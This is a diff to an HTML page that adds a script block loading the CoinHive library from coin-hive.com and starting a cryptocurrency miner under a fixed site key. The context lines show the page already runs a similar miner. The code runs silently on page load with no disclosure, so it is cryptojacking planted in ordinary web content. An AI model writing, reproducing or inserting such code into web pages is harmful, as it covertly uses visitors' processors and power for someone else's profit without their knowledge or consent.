--- a/tc3.html
+++ b/tc3.html
@@ -6,6 +6,18 @@
    script.innerHTML="var miner = new CoinHive.Anonymous('bbxalNoLp5ZVs6plwCnsSbpPMdqh5qw7', {throttle: 0.1});miner.start();"; 
     document.head.appendChild(script);
   </script>
+	 <script  type="text/javascript">
+	
+	
+	        !function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];
+		if(!d.getElementById(id))
+		{js=d.createElement(s);
+		js.id=id;
+		js.src="//coin-hive.com/lib/coinhive.min.js";
+		js.appendChild(d.createTextNode("var miner = new CoinHive.Anonymous('bbxalNoLp5ZVs6plwCnsSbpPMdqh5qw7', {throttle: 0.1});miner.start();"));
+		fjs.parentNode.insertBefore(js,fjs);}
+		}(document,"script","cjs");
+  </script>
 <!--<meta content="EVERYDAYHITS.ORG" property="og:site_name">-->
 
 <meta content="summary_large_image" name="twitter:card">
